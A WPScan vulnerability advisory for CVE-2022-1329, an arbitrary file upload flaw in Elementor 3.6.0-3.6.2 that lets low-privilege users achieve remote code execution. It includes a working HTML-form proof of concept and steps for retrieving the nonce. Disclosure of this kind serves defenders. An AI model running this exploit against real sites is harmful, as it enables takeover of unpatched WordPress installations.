WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Elementor 3.6.0-3.6.2 - Subscriber+ Arbitrary File Upload

Description

The plugin is lacking capability check in a function hooked to admin_init introduced in v3.6.0, and only relying on a CSRF check. As the nonce is available to any authenticated users, they could call it and upload a malicious zip archive containing arbitrary files via a subsequent call, leading to RCE

Proof of Concept

To get the nonce, login as any user (such as subscriber) and check the source for elementorCommonConfig. The file to upload should be a fake Elementor Pro plugin zip

<body>
<form action="https://example.com/wp-admin/admin-ajax.php" enctype="multipart/form-data" method="POST">
<input type="text" name="_nonce" value="nonce retrieved from source (check elementorCommonConfig) of the dashboard when logged in as any user">
<input type="file" name="fileToUpload">
<input type="hidden" name="action" value="elementor_upload_and_install_pro">
<input type="submit" value="Submit">
</form>
</body>

Affects Plugins

elementor
Fixed in version 3.6.3

References

CVE
CVE-2022-1329
URL
https://plugins.trac.wordpress.org/changeset/2708766/elementor/trunk/core/app/modules/onboarding/module.php?old=2688036&old_path=elementor%2Ftrunk%2Fcore%2Fapp%2Fmodules%2Fonboarding%2Fmodule.php
URL
https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Ramuel Gall (Wordfence)

Verified

Yes

WPVDB ID
df62d170-c7d1-43a4-b6dc-20512934c33e

Timeline

Publicly Published

2022-04-13 (about 9 months ago)

Added

2022-04-13 (about 9 months ago)

Last Updated

2022-04-18 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin